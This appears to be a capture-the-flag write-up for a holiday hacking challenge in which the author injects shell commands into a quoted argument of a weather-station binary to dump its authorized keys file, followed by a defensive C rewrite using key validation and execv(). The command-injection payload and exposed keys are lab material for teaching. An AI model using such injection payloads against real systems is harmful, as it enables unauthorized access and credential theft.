Hey - I’m Tom, part of Counter Hack since 2010. I handle testing, QA, logistics, and making sure everyone has the best possible experience. Outside work, I’m often at the community theater, running sound or producing shows.
We’ve lost access to the neighborhood’s weather monitoring station, and there are unpatched vulnerabilities in the snowcat and weather services.
Task: Exploit the vulnerabilities, retrieve the other app’s authorization key, and enter it into your badge. If Frosty freezes everything, our users won’t have a good experience - they’ll have the coldest one.
First, we need to find out which old C programs are used by the application. Let's take a look at the source code:
cat weather-jsps/dashboard.jsp
...
try {
String key = "4b2f3c2d-1f88-4a09-8bd4-d3e5e52e19a6";
Process tempProc = Runtime.getRuntime().exec("/usr/local/weather/temperature " + key);
Process humProc = Runtime.getRuntime().exec("/usr/local/weather/humidity " + key);
Process presProc = Runtime.getRuntime().exec("/usr/local/weather/pressure " + key);
...
Unfortunately, initial simple attempts to find a buffer overflow using fuzzing have failed. Perhaps we can also read something from the strings in the binary before we use a decompiler or other more complex tools.
cd /usr/local/weather/
cat temperature
...
/usr/local/weather/configFailed to open config fileusername=%63s
groupname=%63sInvalid config file format
Invalid username or groupname in config file
Failed to set effective user and group IDs/usr/local/weather/data/temperature%f%.2ftemperature/usr/local/weather/logUsage%s '%s' '%s'/usr/local/weather/keys/authorized_keysFailed to open authorized keys file
Usage: %s <key>
Unauthorized. A valid key must be supplied
wError opening data file%s
Judging by the %s '%s' '%s' format string found in the binary, we assume the system() call looks roughly like:
system("/usr/local/weather/logUsage '%s' '%s'");
So the shell sees:
/usr/local/weather/logUsage 'user' 'KEY '
To inject commands, we break out of the second quoted argument ('...') with the simple pattern ' ; <your command> ; #:
OUT=/tmp/weather_pwn
KEY="4b2f3c2d-1f88-4a09-8bd4-d3e5e52e19a6"
temperature "xx ${KEY} yy';cat /usr/local/weather/keys/* >${OUT};#"
This gives us the second key:
user@weather:/usr/local/weather$ cat /tmp/weather_pwn
4b2f3c2d-1f88-4a09-8bd4-d3e5e52e19a6
8ade723d-9968-45c9-9c33-7606c49c2201
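For contrast, here is how the logger call could be made immune to this kind of injection. This is an added example in C, not code from the challenge binaries; it assumes the logger path /usr/local/weather/logUsage and the argument order implied by the format string above. The key is checked against the UUID shape the dashboard uses, and the arguments go through execv() so no shell ever parses them.

```c
#define _POSIX_C_SOURCE 200809L
#include <ctype.h>
#include <stdio.h>
#include <string.h>
#include <sys/wait.h>
#include <unistd.h>

#define KEY_LEN 36  /* 8-4-4-4-12 hex digits plus four dashes */

/* Reject anything that is not exactly one UUID-shaped key, so quotes,
 * semicolons and '#' never reach the logger at all. */
int is_valid_key(const char *key)
{
    if (key == NULL || strlen(key) != KEY_LEN)
        return 0;
    for (size_t i = 0; i < KEY_LEN; i++) {
        int dash_pos = (i == 8 || i == 13 || i == 18 || i == 23);
        if (dash_pos ? key[i] != '-' : !isxdigit((unsigned char)key[i]))
            return 0;
    }
    return 1;
}

/* Run the logger with an argv array instead of system("... '%s' '%s'"):
 * with no shell involved, the arguments are plain bytes, not syntax.
 * Returns the logger's exit status, or -1 on a rejected key or spawn failure. */
int log_usage(const char *logger, const char *user, const char *key)
{
    if (!is_valid_key(key))
        return -1;
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        char *const argv[] = {(char *)logger, (char *)user, (char *)key, NULL};
        execv(logger, argv);
        _exit(127);  /* exec failed */
    }
    int status;
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(int argc, char **argv)
{
    if (argc != 2) { fprintf(stderr, "Usage: %s <key>\n", argv[0]); return 2; }
    /* logger path is an assumption; it is not taken from the challenge binary */
    return log_usage("/usr/local/weather/logUsage", "user", argv[1]) == 0 ? 0 : 1;
}
```

With this shape, the payload from the write-up above is refused before any process is started, and even an unvalidated string could not become shell syntax because no shell is involved.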